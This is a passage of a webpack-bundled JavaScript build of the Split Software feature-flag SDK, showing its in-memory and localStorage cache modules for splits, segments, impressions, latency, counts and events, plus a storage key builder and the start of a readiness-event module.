    return this.changeNumber;
  };

  _proto.getAll = function getAll() {
    var _this3 = this;

    return this.getKeys().map(function (key) {
      return _this3.splitCache[key];
    });
  };

  _proto.getKeys = function getKeys() {
    return Object.keys(this.splitCache);
  };

  _proto.trafficTypeExists = function trafficTypeExists(trafficType) {
    return Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["l" /* numberIsFinite */])(this.ttCache[trafficType]) && this.ttCache[trafficType] > 0;
  };

  _proto.usesSegments = function usesSegments() {
    return this.getChangeNumber() === -1 || this.splitsWithSegmentsCount > 0;
  };

  _proto.flush = function flush() {
    this.splitCache = {};
    this.ttCache = {};
    this.changeNumber = -1;
    this.splitsWithSegmentsCount = 0;
  }
  /**
   * Fetches multiple splits definitions.
   */
  ;

  _proto.fetchMany = function fetchMany(splitNames) {
    var _this4 = this;

    var splits = {};
    splitNames.forEach(function (splitName) {
      splits[splitName] = _this4.splitCache[splitName] || null;
    });
    return splits;
  }
  /**
   * Check if the splits information is already stored in cache. In memory there is no cache to check.
   */
  ;

  _proto.checkCache = function checkCache() {
    return false;
  };

  return SplitCacheInMemory;
}();

SplitCacheInMemory.prototype.killLocally = __WEBPACK_IMPORTED_MODULE_2__killLocally__["a" /* default */];
/* harmony default export */ __webpack_exports__["a"] = (SplitCacheInMemory);

/***/ }),
/* 2764 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__ = __webpack_require__(1276);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__killLocally__ = __webpack_require__(1277);



var log = Object(__WEBPACK_IMPORTED_MODULE_2__utils_logger__["b" /* default */])('splitio-storage:localstorage');


var SplitCacheLocalStorage = /*#__PURE__*/function () {
  /**
   * @param {Object} keys
   * @param {number} expirationTimestamp
   * @param {Object} splitFiltersValidation
   */
  function SplitCacheLocalStorage(keys, expirationTimestamp, splitFiltersValidation) {
    if (splitFiltersValidation === void 0) {
      splitFiltersValidation = {
        validFilters: [],
        queryString: null,
        groupedFilters: {
          byName: [],
          byPrefix: []
        }
      };
    }

    this.keys = keys;
    this.splitFiltersValidation = splitFiltersValidation;

    this.__checkExpiration(expirationTimestamp);

    this.__checkFilterQuery();
  }

  var _proto = SplitCacheLocalStorage.prototype;

  _proto.decrementCount = function decrementCount(key) {
    var count = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["p" /* toNumber */])(localStorage.getItem(key)) - 1;
    if (count > 0) localStorage.setItem(key, count);else localStorage.removeItem(key);
  };

  _proto.decrementCounts = function decrementCounts(split) {
    try {
      if (split) {
        if (split.trafficTypeName) {
          var ttKey = this.keys.buildTrafficTypeKey(split.trafficTypeName);
          this.decrementCount(ttKey);
        }

        if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__["a" /* default */])(split.conditions)) {
          var segmentsCountKey = this.keys.buildSplitsWithSegmentCountKey();
          this.decrementCount(segmentsCountKey);
        }
      }
    } catch (e) {
      log.error(e);
    }
  };

  _proto.incrementCounts = function incrementCounts(split) {
    try {
      if (split) {
        if (split.trafficTypeName) {
          var ttKey = this.keys.buildTrafficTypeKey(split.trafficTypeName);
          localStorage.setItem(ttKey, Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["p" /* toNumber */])(localStorage.getItem(ttKey)) + 1);
        }

        if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_splits_usesSegments__["a" /* default */])(split.conditions)) {
          var segmentsCountKey = this.keys.buildSplitsWithSegmentCountKey();
          localStorage.setItem(segmentsCountKey, Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["p" /* toNumber */])(localStorage.getItem(segmentsCountKey)) + 1);
        }
      }
    } catch (e) {
      log.error(e);
    }
  };

  _proto.addSplit = function addSplit(splitName, split) {
    try {
      var splitKey = this.keys.buildSplitKey(splitName);
      var splitFromLocalStorage = localStorage.getItem(splitKey);
      var previousSplit = splitFromLocalStorage ? JSON.parse(splitFromLocalStorage) : null;
      this.decrementCounts(previousSplit);
      localStorage.setItem(splitKey, split);
      var parsedSplit = split ? JSON.parse(split) : null;
      this.incrementCounts(parsedSplit);
      return true;
    } catch (e) {
      log.error(e);
      return false;
    }
  };

  _proto.addSplits = function addSplits(entries) {
    var _this = this;

    var results = [];
    entries.forEach(function (keyValuePair) {
      results.push(_this.addSplit(keyValuePair[0], keyValuePair[1]));
    });
    return results;
  };

  _proto.removeSplit = function removeSplit(splitName) {
    try {
      var split = this.getSplit(splitName);
      localStorage.removeItem(this.keys.buildSplitKey(splitName));
      var parsedSplit = JSON.parse(split);
      this.decrementCounts(parsedSplit);
      return 1;
    } catch (e) {
      log.error(e);
      return 0;
    }
  }
  /**
   * Bulk delete of splits from LocalStorage. Returns the number of deleted keys.
   */
  ;

  _proto.removeSplits = function removeSplits(names) {
    var i = 0;
    var len = names.length;
    var counter = 0;

    for (; i < len; i++) {
      counter += this.removeSplit(names[i]);
    }

    return counter;
  };

  _proto.getSplit = function getSplit(splitName) {
    return localStorage.getItem(this.keys.buildSplitKey(splitName));
  };

  _proto.setChangeNumber = function setChangeNumber(changeNumber) {
    // when cache is ready but using a new split query, we must flush all split data
    if (this.cacheReadyButNeedsToFlush) {
      this.flush();
      this.cacheReadyButNeedsToFlush = false;
    } // when using a new split query, we must update it at the store


    if (this.updateNewFilter) {
      log.info('Split filter query was modified. Updating cache.');
      var queryKey = this.keys.buildSplitsFilterQueryKey();
      var queryString = this.splitFiltersValidation.queryString;

      try {
        if (queryString) localStorage.setItem(queryKey, queryString);else localStorage.removeItem(queryKey);
      } catch (e) {
        log.error(e);
      }

      this.updateNewFilter = false;
    }

    try {
      localStorage.setItem(this.keys.buildSplitsTillKey(), changeNumber + ''); // update "last updated" timestamp with current time

      localStorage.setItem(this.keys.buildLastUpdatedKey(), Date.now() + '');
      this.hasSync = true;
      return true;
    } catch (e) {
      log.error(e);
      return false;
    }
  };

  _proto.getChangeNumber = function getChangeNumber() {
    var n = -1;
    var value = localStorage.getItem(this.keys.buildSplitsTillKey());

    if (value !== null) {
      value = parseInt(value, 10);
      return Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["m" /* numberIsNaN */])(value) ? n : value;
    }

    return n;
  };

  _proto.getAll = function getAll() {
    var len = localStorage.length;
    var accum = [];
    var cur = 0;

    while (cur < len) {
      var key = localStorage.key(cur);
      var value = key && localStorage.getItem(key);
      if (key != null && this.keys.isSplitKey(key) && value) accum.push(value);
      cur++;
    }

    return accum;
  };

  _proto.getKeys = function getKeys() {
    var len = localStorage.length;
    var accum = [];
    var cur = 0;

    while (cur < len) {
      var key = localStorage.key(cur);
      if (key != null && this.keys.isSplitKey(key)) accum.push(this.keys.extractKey(key));
      cur++;
    }

    return accum;
  };

  _proto.trafficTypeExists = function trafficTypeExists(trafficType) {
    var ttCount = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["p" /* toNumber */])(localStorage.getItem(this.keys.buildTrafficTypeKey(trafficType)));
    return Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["l" /* numberIsFinite */])(ttCount) && ttCount > 0;
  };

  _proto.usesSegments = function usesSegments() {
    // If cache hasn't been synchronized with the cloud, assume we need them.
    if (!this.hasSync) return true;
    var storedCount = localStorage.getItem(this.keys.buildSplitsWithSegmentCountKey());
    var splitsWithSegmentsCount = storedCount === null ? 0 : Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["p" /* toNumber */])(storedCount);

    if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["l" /* numberIsFinite */])(splitsWithSegmentsCount)) {
      return splitsWithSegmentsCount > 0;
    } else {
      return true;
    }
  }
  /**
   * Removes all splits cache related data from localStorage (splits, counters, changeNumber and lastUpdated).
   * We cannot simply call `localStorage.clear()` since that implies removing user items from the storage.
   */
  ;

  _proto.flush = function flush() {
    log.info('Flushing Splits data from localStorage'); // collect item keys

    var len = localStorage.length;
    var accum = [];

    for (var cur = 0; cur < len; cur++) {
      var key = localStorage.key(cur);
      if (key != null && this.keys.isSplitCacheKey(key)) accum.push(key);
    } // remove items


    accum.forEach(function (key) {
      localStorage.removeItem(key);
    });
    this.hasSync = false;
  }
  /**
   * Fetches multiple splits definitions.
   */
  ;

  _proto.fetchMany = function fetchMany(splitNames) {
    var _this2 = this;

    var splits = {};
    splitNames.forEach(function (splitName) {
      splits[splitName] = localStorage.getItem(_this2.keys.buildSplitKey(splitName));
    });
    return splits;
  }
  /**
   * Check if the splits information is already stored in cache.
   * It is used as condition to emit SDK_SPLITS_CACHE_LOADED, and then SDK_READY_FROM_CACHE.
   * In this function we could add more code to check if the data is valid.
   */
  ;

  _proto.checkCache = function checkCache() {
    return this.getChangeNumber() > -1 || this.cacheReadyButNeedsToFlush;
  }
  /**
   * Clean Splits cache if its `lastUpdated` timestamp is older than the given `expirationTimestamp`,
   * Clean operation (flush) also updates `lastUpdated` timestamp with current time.
   *
   * @param {number | undefined} expirationTimestamp if the value is not a number, data will not be cleaned
   */
  ;

  _proto.__checkExpiration = function __checkExpiration(expirationTimestamp) {
    var value = localStorage.getItem(this.keys.buildLastUpdatedKey());

    if (value !== null) {
      value = parseInt(value, 10);
      if (!Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["m" /* numberIsNaN */])(value) && value < expirationTimestamp) this.flush();
    }
  };

  _proto.__checkFilterQuery = function __checkFilterQuery() {
    var _this3 = this;

    var _this$splitFiltersVal = this.splitFiltersValidation,
        queryString = _this$splitFiltersVal.queryString,
        groupedFilters = _this$splitFiltersVal.groupedFilters;
    var queryKey = this.keys.buildSplitsFilterQueryKey();
    var currentQueryString = localStorage.getItem(queryKey);

    if (currentQueryString !== queryString) {
      try {
        // mark cache to update the new query filter on first successful splits fetch
        this.updateNewFilter = true; // if cache is ready:

        if (this.checkCache()) {
          // * set change number to -1, to fetch splits with -1 `since` value.
          localStorage.setItem(this.keys.buildSplitsTillKey(), '-1'); // * remove from cache splits that doesn't match with the new filters

          this.getKeys().forEach(function (splitName) {
            if (queryString && (groupedFilters.byName.indexOf(splitName) > -1 || groupedFilters.byPrefix.some(function (prefix) {
              return splitName.startsWith(prefix + '__');
            }))) {
              // * set `cacheReadyButNeedsToFlush` so that `checkCache` returns true (the storage is ready to be used) and the data is flushed before updating on first successful splits fetch
              _this3.cacheReadyButNeedsToFlush = true;
              return;
            }

            _this3.removeSplit(splitName);
          });
        }
      } catch (e) {
        log.error(e);
      }
    } // if the filter didn't change, nothing is done

  };

  return SplitCacheLocalStorage;
}();

SplitCacheLocalStorage.prototype.killLocally = __WEBPACK_IMPORTED_MODULE_3__killLocally__["a" /* default */];
/* harmony default export */ __webpack_exports__["a"] = (SplitCacheLocalStorage);

/***/ }),
/* 2765 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
var SegmentCacheInMemory = /*#__PURE__*/function () {
  function SegmentCacheInMemory(keys) {
    this.keys = keys;
    this.flush();
  }

  var _proto = SegmentCacheInMemory.prototype;

  _proto.flush = function flush() {
    this.segmentCache = {};
  };

  _proto.addToSegment = function addToSegment(segmentName
  /*, segmentKeys: Array<string>*/
  ) {
    var segmentKey = this.keys.buildSegmentNameKey(segmentName);
    this.segmentCache[segmentKey] = true;
    return true;
  };

  _proto.removeFromSegment = function removeFromSegment(segmentName
  /*, segmentKeys: Array<string>*/
  ) {
    var segmentKey = this.keys.buildSegmentNameKey(segmentName);
    delete this.segmentCache[segmentKey];
    return true;
  }
  /**
   * Reset (update) the cached list of segments with the given list, removing and adding segments if necessary.
   * @NOTE based on the way we use segments in the browser, this way is the best option
   *
   * @param {string[]} segmentNames list of segment names
   * @returns boolean indicating if the cache was updated (i.e., given list was different from the cached one)
   */
  ;

  _proto.resetSegments = function resetSegments(segmentNames) {
    var _this = this;

    var isDiff = false;
    var index;
    var storedSegmentKeys = Object.keys(this.segmentCache); // Extreme fast => everything is empty

    if (segmentNames.length === 0 && storedSegmentKeys.length === segmentNames.length) return isDiff; // Quick path

    if (storedSegmentKeys.length !== segmentNames.length) {
      isDiff = true;
      this.segmentCache = {};
      segmentNames.forEach(function (s) {
        _this.addToSegment(s);
      });
    } else {
      // Slowest path => we need to find at least 1 difference because
      for (index = 0; index < segmentNames.length && this.isInSegment(segmentNames[index]); index++) {// TODO: why empty statement?
      }

      if (index < segmentNames.length) {
        isDiff = true;
        this.segmentCache = {};
        segmentNames.forEach(function (s) {
          _this.addToSegment(s);
        });
      }
    }

    return isDiff;
  };

  _proto.isInSegment = function isInSegment(segmentName
  /*, key: string*/
  ) {
    var segmentKey = this.keys.buildSegmentNameKey(segmentName);
    return this.segmentCache[segmentKey] === true;
  };

  _proto.setChangeNumber = function setChangeNumber()
  /*segmentName: string, changeNumber: number*/
  {
    return true;
  };

  _proto.getChangeNumber = function getChangeNumber()
  /*segmentName: string*/
  {
    return -1;
  };

  _proto.registerSegment = function registerSegment()
  /*segment: string*/
  {
    return false;
  };

  _proto.registerSegments = function registerSegments()
  /*segments: Iterable<string>*/
  {
    return false;
  };

  _proto.getRegisteredSegments = function getRegisteredSegments() {
    return [];
  };

  return SegmentCacheInMemory;
}();

/* harmony default export */ __webpack_exports__["a"] = (SegmentCacheInMemory);

/***/ }),
/* 2766 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-storage:localstorage');
var DEFINED = '1';

var SegmentCacheInLocalStorage = /*#__PURE__*/function () {
  function SegmentCacheInLocalStorage(keys) {
    this.keys = keys; // There is not need to flush segments cache like splits cache, since resetSegments receives the up-to-date list of active segments
  }

  var _proto = SegmentCacheInLocalStorage.prototype;

  _proto.addToSegment = function addToSegment(segmentName
  /*, segmentKeys: Array<string>*/
  ) {
    var segmentKey = this.keys.buildSegmentNameKey(segmentName);

    try {
      localStorage.setItem(segmentKey, DEFINED);
      return true;
    } catch (e) {
      log.error(e);
      return false;
    }
  };

  _proto.removeFromSegment = function removeFromSegment(segmentName
  /*, segmentKeys: Array<string>*/
  ) {
    var segmentKey = this.keys.buildSegmentNameKey(segmentName);

    try {
      localStorage.removeItem(segmentKey);
      return true;
    } catch (e) {
      log.error(e);
      return false;
    }
  }
  /**
   * Reset (update) the cached list of segments with the given list, removing and adding segments if necessary.
   *
   * @param {string[]} segmentNames list of segment names
   * @returns boolean indicating if the cache was updated (i.e., given list was different from the cached one)
   */
  ;

  _proto.resetSegments = function resetSegments(segmentNames) {
    var _this = this;

    var isDiff = false;
    var index; // Scan current values from localStorage

    var storedSegmentNames = Object.keys(localStorage).reduce(function (accum, key) {
      var segmentName = _this.keys.extractSegmentName(key);

      if (segmentName) accum.push(segmentName);
      return accum;
    }, []); // Extreme fast => everything is empty

    if (segmentNames.length === 0 && storedSegmentNames.length === segmentNames.length) return isDiff; // Quick path

    if (storedSegmentNames.length !== segmentNames.length) {
      isDiff = true;
      storedSegmentNames.forEach(function (segmentName) {
        return _this.removeFromSegment(segmentName);
      });
      segmentNames.forEach(function (segmentName) {
        return _this.addToSegment(segmentName);
      });
    } else {
      // Slowest path => we need to find at least 1 difference because
      for (index = 0; index < segmentNames.length && storedSegmentNames.indexOf(segmentNames[index]) !== -1; index++) {// TODO: why empty statement?
      }

      if (index < segmentNames.length) {
        isDiff = true;
        storedSegmentNames.forEach(function (segmentName) {
          return _this.removeFromSegment(segmentName);
        });
        segmentNames.forEach(function (segmentName) {
          return _this.addToSegment(segmentName);
        });
      }
    }

    return isDiff;
  };

  _proto.isInSegment = function isInSegment(segmentName
  /*, key: string*/
  ) {
    return localStorage.getItem(this.keys.buildSegmentNameKey(segmentName)) === DEFINED;
  };

  _proto.setChangeNumber = function setChangeNumber()
  /*segmentName: string, changeNumber: number*/
  {
    return true;
  };

  _proto.getChangeNumber = function getChangeNumber()
  /*segmentName: string*/
  {
    return -1;
  };

  _proto.registerSegment = function registerSegment()
  /*segment: string*/
  {
    return false;
  };

  _proto.registerSegments = function registerSegments()
  /*segments: Iterable<string>*/
  {
    return false;
  };

  _proto.getRegisteredSegments = function getRegisteredSegments() {
    return [];
  }
  /**
   * Removes list of segments from localStorage
   * @NOTE this method is not being used at the moment
   */
  ;

  _proto.flush = function flush() {
    log.info('Flushing MySegments data from localStorage'); // We cannot simply call `localStorage.clear()` since that implies removing user items from the storage
    // We could optimize next sentence, since it implies iterating over all localStorage items

    this.resetSegments([]);
  };

  return SegmentCacheInLocalStorage;
}();

/* harmony default export */ __webpack_exports__["a"] = (SegmentCacheInLocalStorage);

/***/ }),
/* 2767 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
var ImpressionsCacheInMemory = /*#__PURE__*/function () {
  function ImpressionsCacheInMemory() {
    this.queue = [];
  }
  /**
   * Get collected data
   */


  var _proto = ImpressionsCacheInMemory.prototype;

  _proto.state = function state() {
    return this.queue;
  }
  /**
   * Store objects in sequential order
   */
  ;

  _proto.track = function track(data) {
    var _this$queue;

    (_this$queue = this.queue).push.apply(_this$queue, data);

    return this;
  }
  /**
   * Recycle the collector queue
   */
  ;

  _proto.clear = function clear() {
    this.queue.length = 0;
    return this;
  }
  /**
   * Hook JSON.stringify to expose the state of the counters
   */
  ;

  _proto.toJSON = function toJSON() {
    return this.queue;
  }
  /**
   * Check if the is data changed from the defaults
   */
  ;

  _proto.isEmpty = function isEmpty() {
    return this.queue.length === 0;
  };

  return ImpressionsCacheInMemory;
}();

/* harmony default export */ __webpack_exports__["a"] = (ImpressionsCacheInMemory);

/***/ }),
/* 2768 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__findIndex__ = __webpack_require__(2769);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var LatencyCacheInMemory = /*#__PURE__*/function () {
  function LatencyCacheInMemory() {
    this.clear();
  }

  var _proto = LatencyCacheInMemory.prototype;

  _proto.clear = function clear() {
    this.counters = {};
    return this;
  };

  _proto.state = function state() {
    return this.counters;
  };

  _proto.track = function track(metricName, latency) {
    // Initialize if needed
    if (this.counters[metricName] === undefined) {
      this.counters[metricName] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    } // +1 based on the latency number


    this.counters[metricName][Object(__WEBPACK_IMPORTED_MODULE_0__findIndex__["a" /* default */])(latency)]++;
    return this;
  };

  _proto.isEmpty = function isEmpty() {
    return Object.keys(this.counters).length === 0;
  };

  _proto.toJSON = function toJSON() {
    return this.counters;
  };

  return LatencyCacheInMemory;
}();

/* harmony default export */ __webpack_exports__["a"] = (LatencyCacheInMemory);

/***/ }),
/* 2769 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_binarySearch__ = __webpack_require__(2770);

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__utils_binarySearch__["a" /* default */].bind(null, [1, 1.5, 2.25, 3.38, 5.06, 7.59, 11.39, 17.09, 25.63, 38.44, 57.67, 86.5, 129.75, 194.62, 291.93, 437.89, 656.84, 985.26, 1477.89, 2216.84, 3325.26, 4987.89, 7481.83]));

/***/ }),
/* 2770 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function bs(items, value) {
  var startIndex = 0;
  var stopIndex = items.length - 1;
  var middle = Math.floor((stopIndex + startIndex) / 2);
  var minIndex = startIndex;
  var maxIndex = stopIndex;

  while (items[middle] !== value && startIndex < stopIndex) {
    // adjust search area
    if (value < items[middle]) {
      stopIndex = middle - 1;
    } else if (value > items[middle]) {
      startIndex = middle + 1;
    } // recalculate middle


    middle = Math.floor((stopIndex + startIndex) / 2);
  } // correct if middle is out of range


  if (middle < minIndex) {
    middle = minIndex;
  } else if (middle > maxIndex) {
    middle = maxIndex;
  } // we want to always return based on strict minor comparation


  if (value < items[middle] && middle > minIndex) {
    return middle - 1;
  }

  return middle;
}

/* harmony default export */ __webpack_exports__["a"] = (bs);

/***/ }),
/* 2771 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
var CountCacheInMemory = /*#__PURE__*/function () {
  function CountCacheInMemory() {
    this.clear();
  }

  var _proto = CountCacheInMemory.prototype;

  _proto.clear = function clear() {
    this.counters = {};
    return this;
  };

  _proto.state = function state() {
    return this.counters;
  };

  _proto.track = function track(metricName) {
    if (this.counters[metricName] === undefined) this.counters[metricName] = 1;else this.counters[metricName]++;
    return this.counters[metricName];
  };

  _proto.isEmpty = function isEmpty() {
    return Object.keys(this.counters).length === 0;
  };

  _proto.toJSON = function toJSON() {
    return this.counters;
  };

  return CountCacheInMemory;
}();

/* harmony default export */ __webpack_exports__["a"] = (CountCacheInMemory);

/***/ }),
/* 2772 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var MAX_QUEUE_BYTE_SIZE = 5 * 1024 * 1024; // 5M

var EventsCache = /*#__PURE__*/function () {
  function EventsCache(context) {
    var _this = this;

    var settings = context.get(context.constants.SETTINGS);
    var eventsModule = context.get(context.constants.EVENTS);
    this.onFullQueue = false;
    this.maxQueue = settings.scheduler.eventsQueueSize;
    this.queue = [];
    this.queueByteSize = 0;

    if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_promise_thenable__["a" /* default */])(eventsModule)) {
      eventsModule.then(function (events) {
        _this.onFullQueue = events.flushAndResetTimer;

        _this._checkForFlush(); // Events is ready, check the queue.

      });
    } else if (typeof eventsModule.flushAndResetTimer === 'function') {
      this.onFullQueue = eventsModule.flushAndResetTimer;
    }
  }
  /**
   * Get the current state of the queue.
   */


  var _proto = EventsCache.prototype;

  _proto.state = function state() {
    return this.queue;
  }
  /**
   * Add a new event object at the end of the queue.
   */
  ;

  _proto.track = function track(data, size) {
    if (size === void 0) {
      size = 0;
    }

    this.queueByteSize += size;
    this.queue.push(data);

    this._checkForFlush();

    return true;
  }
  /**
   * Clear the data stored on the cache.
   */
  ;

  _proto.clear = function clear() {
    this.queue = [];
    this.queueByteSize = 0;
    return this;
  }
  /**
   * Returns the payload we will use for posting data.
   */
  ;

  _proto.toJSON = function toJSON() {
    return this.queue;
  }
  /**
   * Check if the cache is empty.
   */
  ;

  _proto.isEmpty = function isEmpty() {
    return this.queue.length === 0;
  }
  /**
   * Check if the cache queue is full and we need to flush it.
   */
  ;

  _proto._checkForFlush = function _checkForFlush() {
    if (this.queueByteSize > MAX_QUEUE_BYTE_SIZE || // 0 means no maximum value, in case we want to avoid this being triggered. Size limit is not affected by it.
    this.maxQueue > 0 && this.queue.length >= this.maxQueue) {
      this.onFullQueue && this.onFullQueue();
    }
  };

  return EventsCache;
}();

/* harmony default export */ __webpack_exports__["a"] = (EventsCache);

/***/ }),
/* 2773 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__ = __webpack_require__(696);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Keys__ = __webpack_require__(1278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_key_factory__ = __webpack_require__(492);





var KeyBuilderForLocalStorage = /*#__PURE__*/function (_KeyBuilder) {
  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_inheritsLoose__["a" /* default */])(KeyBuilderForLocalStorage, _KeyBuilder);

  function KeyBuilderForLocalStorage(settings) {
    var _this;

    _this = _KeyBuilder.call(this, settings) || this;
    _this.regexSplitCacheKey = new RegExp("^" + _this.settings.storage.prefix + "\\.(splits?|trafficType)\\.");
    return _this;
  }

  var _proto = KeyBuilderForLocalStorage.prototype;

  _proto.buildSegmentNameKey = function buildSegmentNameKey(segmentName) {
    return Object(__WEBPACK_IMPORTED_MODULE_3__utils_key_factory__["b" /* matching */])(this.settings.core.key) + "." + this.settings.storage.prefix + ".segment." + segmentName;
  };

  _proto.extractSegmentName = function extractSegmentName(builtSegmentKeyName) {
    var prefix = Object(__WEBPACK_IMPORTED_MODULE_3__utils_key_factory__["b" /* matching */])(this.settings.core.key) + "." + this.settings.storage.prefix + ".segment.";
    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["o" /* startsWith */])(builtSegmentKeyName, prefix)) return builtSegmentKeyName.substr(prefix.length);
  };

  _proto.buildSplitsWithSegmentCountKey = function buildSplitsWithSegmentCountKey() {
    return this.settings.storage.prefix + ".splits.usingSegments";
  };

  _proto.buildLastUpdatedKey = function buildLastUpdatedKey() {
    return this.settings.storage.prefix + ".splits.lastUpdated";
  };

  _proto.isSplitCacheKey = function isSplitCacheKey(key) {
    return this.regexSplitCacheKey.test(key);
  };

  _proto.buildSplitsFilterQueryKey = function buildSplitsFilterQueryKey() {
    return this.settings.storage.prefix + ".splits.filterQuery";
  };

  return KeyBuilderForLocalStorage;
}(__WEBPACK_IMPORTED_MODULE_2__Keys__["a" /* default */]);

/* harmony default export */ __webpack_exports__["a"] = (KeyBuilderForLocalStorage);

/***/ }),
/* 2774 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_events__ = __webpack_require__(275);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_events___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_events__);

var SPLITS_READY = 2;
var SEGMENTS_READY = 4;
var SDK_FIRE_READY = SPLITS_READY | SEGMENTS_READY; // 2 + 4 = 6

var SDK_NOTIFY_UPDATE_SINCE_NOW = 8;
var SDK_FIRE_UPDATE = SDK_FIRE_READY | SDK_NOTIFY_UPDATE_SINCE_NOW; // 6 + 8 = 14

var Events = {
  SDK_READY_TIMED_OUT: 'init::timeout',
  SDK_READY: 'init::ready',
  SDK_READY_FROM_CACHE: 'init::cache-ready',
  SDK_SPLITS_ARRIVED: 'state::splits-arrived',
  SDK_SEGMENTS_ARRIVED: 'state::segments-arrived',
  SDK_SPLITS_CACHE_LOADED: 'state::splits-cache-loaded',
  SDK_UPDATE: 'state::update',
  READINESS_GATE_CHECK_STATE: 'state::check'
};
/**
 * Machine state to handle the ready / update event propagation.
 */

function GateContext() {
  // Splits are shared through all instances of the same SDK.
  var splitsStatus = 0;
  var splits = new __WEBPACK_IMPORTED_MODULE_0_events___default.a();
  splits.SDK_SPLITS_CACHE_LOADED = Events.SDK_SPLITS_CACHE_LOADED;
  splits.SDK_SPLITS_ARRIVED = Events.SDK_SPLITS_ARRIVED; // references counter: how many

  var refCount = 0;

  function ReadinessGateFactory(splits, segments) {
    var gate = new __WEBPACK_IMPORTED_MODULE_0_events___default.a();
    var segmentsStatus = 0;
    var status = 0;
    gate.on(Events.READINESS_GATE_CHECK_STATE, function () {
      if (status !== SDK_FIRE_UPDATE && splitsStatus + segmentsStatus === SDK_FIRE_READY) {
        status = SDK_FIRE_UPDATE;
        gate.emit(Events.SDK_READY);
      } else if (status === SDK_FIRE_UPDATE) {
        gate.emit(Events.SDK_UPDATE);
      }
    });
    splits.on(Events.SDK_SPLITS_ARRIVED, function (isSplitKill) {
      // `isSplitKill` condition avoids an edge-case of wrongly emitting SDK_READY if:
